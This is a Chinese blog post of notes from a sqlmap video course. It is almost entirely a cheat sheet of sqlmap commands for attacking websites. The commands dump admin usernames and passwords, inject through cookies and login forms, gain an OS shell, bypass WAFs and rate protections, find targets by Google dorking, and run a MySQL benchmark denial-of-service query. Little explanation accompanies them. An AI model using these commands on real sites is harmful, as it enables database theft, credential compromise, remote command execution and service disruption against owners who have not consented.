羽翼sqlmap视频笔记

access 注入

./sqlmap.py -u "url"          注入判断
./sqlmap.py -u "url" --tables  跑表
./sqlmap.py -u "url" --columns -T admin  猜解字段
./sqlmap.py -u "url" --dump -T admin -C "username,password"



mysql系列课程
sqlmap -u "url" --dbs  获取数据库
sqlmap -u "url" -D myslibrary --tables   获取数据库中的表    这里是猜解爆破数据
sqlmap -u "url" -D myslibrary --T hy_admin --columns 爆列名
sqlmap -u "url" -D myslibrary --T hy_admin -C id,user,password --dump  获取字段内容


cookie注入
sqlmap -u "url" --cookie "id=9" --table --level 2   cookie注入
sqlmap -u "url" --cookie "id=9" --columns  -T admin --level 2 爆表
sqlmap -u "url" --cookie "id=9" --dump -T admin -C "username,password" --level 2

post登陆框注入
自动搜索表单
sqlmap -u "url" --forms   自动注入
sqlmap -u "url" --data "参数"  指定参数注入

交互写shell 及命令执行
sqlmap -u "url" --os-cmd=ipconfig
sqlmap -u "url" --os-shell   获取shell


伪静态注入
sqlmap -u "url?id=54*.html" --dbs    在注入的地方放一个*字键 然后进行注入
sqlmap -u "url?id=54*.html" -D preem --tables 获取表
sqlmap -u "url?id=54*.html" -D preem -T pe_user --columns  得到列
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password --dump


请求延时   绕过网站的一些防护
sqlmap --dbs -u "url/40*.html" --delay 1    根据1秒来获取
sqlmap --dbs -u "url/40*.html" --safe-freq 2   2次请求之后访问一个正确界面


来把google
sqlmap -g inurl:php?id=1


mysql dos攻击
sqlmap -u "url" --sql-shell   首先获取shell
select benchmark(999999999999,0x70726f626e646f70726f62616e646f70726f62616e646ff)


绕过waf防火墙
sqlmap -u "url" -v 3 --dbs --batch --tamper "charencode.py"   可以绕过一些过滤进行注入
sqlmap -u "url" --privileges 查看当前用户权限

posted @ 2016-08-06 15:59  空为莫  阅读(401)  评论(1编辑  收藏  举报